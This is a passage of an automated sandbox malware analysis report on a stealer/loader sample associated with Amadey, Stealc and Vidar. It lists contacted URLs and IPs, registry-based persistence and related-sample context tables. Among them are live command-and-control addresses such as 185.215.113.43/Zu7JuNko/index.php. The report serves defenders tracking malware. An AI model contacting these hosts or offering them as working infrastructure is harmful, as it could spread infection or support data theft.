http://185.215.113.43/Zu7JuNko/index.php)a	skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpf	file.exe, 00000000.00000002.2435919050.0000000023272000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpl	9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://web.skype.com/?	000003.ldb.9.dr	false		high
http://185.215.113.43/l	skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpP	skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php6	skotes.exe, 00000018.00000002.5411293515.000000000123F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/2c2e-da81-46d0-b6b6-535557bcc5faXX	9305c7ab92.exe, 00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpR;	6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/gewarren	chromecache_573.4.dr	false		high
https://navygenerayk.store/Fo	6ca8f7e5e2.exe, 0000001C.00000003.2978029803.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.3134891644.0000000001307000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2952635468.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.3135063410.000000000130A000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2989243380.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2933378558.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2949173424.000000000130B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php(	skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php-	skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/apihpcRGN	6ca8f7e5e2.exe, 0000002B.00000003.3452997592.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515504850.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_573.4.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.2w5	rundll32.exe, 00000027.00000002.5403295633.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-autopush.corp.google.com/	manifest.json0.9.dr	false		high
http://185.215.113.206/SSC:	6ca8f7e5e2.exe, 0000002B.00000003.3735190194.0000000005C15000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3775896339.0000000005C15000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.209/Fru7Nk9/index.phpST	rundll32.exe, 00000019.00000002.5401399081.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.185.228	unknown	United States	15169	GOOGLEUS	false
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.125.209.212	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
23.198.7.167	unknown	United States	20940	AKAMAI-ASN1EU	false
23.218.232.185	unknown	United States	24835	RAYA-ASEG	false
23.221.22.207	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.91.96.185	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	navygenerayk.store	European Union	13335	CLOUDFLARENETUS	false
20.96.153.111	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.209	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
108.156.245.115	unknown	United States	16509	AMAZON-02US	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.16.193	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
23.198.7.181	unknown	United States	20940	AKAMAI-ASN1EU	false
23.198.7.184	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.186.174	plus.l.google.com	United States	15169	GOOGLEUS	false
216.58.206.78	play.google.com	United States	15169	GOOGLEUS	false
18.244.18.27	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
20.189.173.17	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
23.192.223.200	unknown	United States	16625	AKAMAI-ASUS	false
13.107.246.57	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.198.7.176	unknown	United States	20940	AKAMAI-ASN1EU	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552989
Start date and time:	2024-11-10 04:54:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@123/418@80/32
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.186.46, 64.233.167.84, 34.104.35.123, 142.250.184.227, 216.58.206.74, 142.250.184.234, 142.250.74.202, 142.250.185.74, 142.250.186.138, 172.217.23.106, 142.250.186.74, 172.217.18.10, 172.217.16.202, 142.250.186.42, 216.58.212.170, 142.250.184.202, 142.250.185.106, 142.250.186.106, 216.58.212.138, 216.58.206.42, 142.250.185.138, 172.217.16.138, 2.22.50.131, 192.229.221.95, 204.79.197.203, 13.107.42.16, 204.79.197.239, 13.107.21.239, 142.250.186.78, 13.107.6.158, 2.20.245.139, 2.20.245.132, 20.191.45.158, 104.124.11.163, 104.124.11.224, 2.23.209.185, 2.23.209.179, 2.23.209.130, 2.23.209.182, 2.23.209.133, 2.23.209.189, 2.23.209.140, 13.74.129.1, 204.79.197.237, 13.107.21.237, 23.38.98.114, 23.38.98.107, 23.38.98.71, 23.38.98.98, 23.38.98.121, 23.38.98.78, 23.38.98.105, 23.38.98.100, 23.38.98.73, 2.23.209.149, 2.23.209.187, 217.20.57.20, 23.32.186.57, 142.250.185.99, 172.217.16.142, 20.189.173.12, 23.32.186.2, 20.189.173.5, 142.250.185.234, 142.250.
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, onedscolprdwus11.westus.cloudapp.azure.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, e11290.dspg.akamaiedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, star-azurefd-prod.trafficmanager.net, learn.microsoft.com.edgekey.net, update.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, content-autofill.googleapis.com, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.traf
Execution Graph export aborted for target file.exe, PID 1868 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:55:35	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
04:56:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6ca8f7e5e2.exe C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe
04:56:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6ca8f7e5e2.exe C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe
04:57:01	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9305c7ab92.exe C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe
04:57:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9fc857756c.exe C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe
04:57:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9305c7ab92.exe C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe
04:57:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9fc857756c.exe C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe
22:55:25	API Interceptor	39x Sleep call for process: file.exe modified
22:56:01	API Interceptor	9388655x Sleep call for process: skotes.exe modified
22:56:20	API Interceptor	122x Sleep call for process: 6ca8f7e5e2.exe modified
22:56:41	API Interceptor	4694262x Sleep call for process: rundll32.exe modified
22:57:11	API Interceptor	21x Sleep call for process: 9305c7ab92.exe modified

LLM Input / Output

Input	Output
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: URL: https://microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: URL: https://learn.microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: claude-3-haiku-20240307	```json { "brands": [ "Microsoft", "NET" ] }
	```json { "brands": [ "Microsoft", "NET" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: claude-3-haiku-20240307	```json { "brands": [ "Microsoft" ] }
	```json { "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	6uqT7ARJKQ.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	qY6icLzPUp.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
20.125.209.212	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	HrxOpVxK5d.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
13.107.246.45	https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4	Get hash	malicious	HTMLPhisher	Browse	nam.dcv.ms/BxPVLH2cz4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	https://qrco.de/bfYBpc	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	HrxOpVxK5d.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	172.64.41.3
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	HrxOpVxK5d.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	94.245.104.56
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe	Get hash	malicious	GuLoader, Remcos	Browse	94.245.104.56
sb.scorecardresearch.com	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.154.84.35
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.245.60.72
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.32
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.245.60.72
	HrxOpVxK5d.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.27
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	18.245.60.53
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	18.239.83.98
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.245.60.107
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.38
	https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	18.244.18.27

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	debug.dbg.elf	Get hash	malicious	Mirai, Moobot	Browse	70.37.100.61
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.40.166
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	157.56.241.246
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.227.121
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.227.128
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	Cursor Commander.exe	Get hash	malicious	Unknown	Browse	20.157.217.118
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	52.228.161.161
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	debug.dbg.elf	Get hash	malicious	Mirai, Moobot	Browse	70.37.100.61
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.40.166
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	157.56.241.246
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.227.121
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.227.128
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	Cursor Commander.exe	Get hash	malicious	Unknown	Browse	20.157.217.118
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	52.228.161.161
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.dll	Get hash	malicious	Amadey	Browse	185.215.113.209
	file.dll	Get hash	malicious	Amadey	Browse	185.215.113.209
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	https://glanwell.com/TJCe1B-ewnB0-yGJ1J-6CtU5-ILAx4-iXe2y-W2bJk.php	Get hash	malicious	Unknown	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	https://telegra.ph/yyrgrfwdfeg-10-25?4077	Get hash	malicious	Unknown	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	https://petsworld.nl/trigger.php?r_link=https%3A%2F%2Ftelegra.ph%2Fyyrgrfwdfeg-10-25%3F4077	Get hash	malicious	Unknown	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	New Fax Notification.html	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	https://qrco.de/bfYBpc	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	fpY959AM6i.exe	Get hash	malicious	Stealc	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	4.175.87.197 23.32.185.164 40.126.31.67 13.107.246.45
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.97.3 51.11.192.48
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3 51.11.192.48

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	g8Z5OO8o6p.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	xQ9Dzc7cj9.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
